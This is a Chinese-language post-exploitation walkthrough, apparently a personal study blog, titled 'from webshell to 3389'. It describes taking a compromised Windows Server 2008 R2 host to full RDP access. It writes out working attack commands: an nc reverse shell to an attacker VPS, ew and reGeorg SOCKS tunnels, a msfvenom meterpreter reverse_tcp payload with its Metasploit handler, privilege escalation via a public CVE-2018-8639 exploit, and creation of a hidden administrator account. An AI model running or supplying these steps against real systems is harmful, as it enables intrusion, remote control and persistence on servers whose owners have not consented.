从webshell到3389

之前玩过一下 linux 下的提权，前段时间在上课的时候看了亮神的文章，感觉渗透还是不应该只停留在web层面。虽然说连WEB层面的东西都还没搞懂，但是还是想拓宽一下自己的攻击思路。当拿到了一个webshell之后，还能干什么呢？之前挖SRC，运气好也撞到过一个RCE，但是这些都只能停留在拿了 shell 之后，就不能再测下去了，后渗透这块，完全不清楚，虽然这次还是没有接触到域渗透，但是学了一些内网与代理之类的知识，还是做个小结为好。

正文

一些信息

首先

拿到了一台服务器的webshell，这台机的状况

• 只有一个内网IP
• webshell权限 nt authority\network service（非system）可以执行命令
• Microsoft Windows Server 2008 R2
• systeminfo 补丁到 [246]: KB4034733（补丁最后时间大概在2016年左右）
• 不存在域

由于在内网里面，很多操作需要用到代理。

内网端口转发：阿烨师傅的文章 https://www.jianshu.com/p/735e8f1746f0

我个人使用了

ew

我尝试了用连接 本机-vps-webshell

ps:如果需要交互可以上传一个nc和cmd 反弹cmd

vul: nc -e cmd.exe yourvps 2333
vps: nc -lvvp 2333

一般ew是会被杀，暂时没有了解免杀方面的知识

vul: ew -s rssocks -d yourvps -e 2333
vps: ./ew_for_linux64 -s rcsocks -l 1080 -e 2333

自己的电脑可以直接上个代理

地址: yourvps 2333

reGeorg与Proxifier

详细可以看 https://xz.aliyun.com/t/228

上传tunnel.aspx

访问显示

Georg says, 'All seems fine

运行

python reGeorgSocksProxy.py -p 9999 -u http://xxxxxx.com/tunnel.asp

设置代理服务器为9999

设置好代理之后就可以3389链接了

连接地址：vul的内网ip

上传meterpreter

渗透自然少不了metaspolit

在拿了webshell之后，上次一个meterpreter上去会方便很多操作，

可以参考亮神的Micro8

https://micro8.gitbook.io/micro8/contents-1/1-10/10msfvenom-chang-yong-sheng-cheng-payload-ming-ling

我在腾讯云上生成好像在运行的时候报错了，所以我直接在我的windows上生成了

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=yourvps LPORT=2334 -f exe > payload.exe

在vps上

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost yourvps
set lport 2334
exploit

获取到会话

关于meterpreter的操作可以参考先知社区的 https://xz.aliyun.com/t/2536

提权

meterpreter的某些操作需要足够的权限，以及我并没有一个可以登入3389的账户，webshell本身权限也不够，所以提权是必不可少的。

同样的亮神的第一课和第二课都是关于提权的。

windows下的提权

对外公开的exp: https://github.com/SecWiki/windows-kernel-exploits

我选择了CVE-2018-8639来提权

https://github.com/ze0r/CVE-2018-8639-exp

exp.exe

再whoami,权限变成了

nt authority\system

添加一个账户并且给他管理员

net user test password /add
net localgroup administrators test /add

reGeorg与Proxifier配合使用登入3389